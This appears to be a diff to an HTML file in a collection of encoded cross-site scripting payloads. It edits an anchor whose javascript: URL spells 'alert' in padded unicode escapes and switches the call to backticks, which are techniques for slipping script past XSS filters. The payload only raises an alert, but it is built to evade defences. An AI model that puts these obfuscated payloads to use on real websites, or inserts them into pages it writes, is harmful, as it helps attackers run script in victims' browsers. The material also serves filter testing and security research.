--- a/Encoding Obfuscate/unicodeXSS.html
+++ b/Encoding Obfuscate/unicodeXSS.html
@@ -5,4 +5,4 @@
 
 <!-- Work -->
 <!-- <a href="javascript:\u0061\u006c\u0065\u0072\u0074(1)">Click me</a> -->
-<a href="javascript:\u{00000000000000000000061}\u006c\u0065\u0072\u0074(1)">Click me</a>
+<a href="javascript:\u{00000000000000000000061}\u006c\u0065\u0072\u0074`1`">Click me</a>
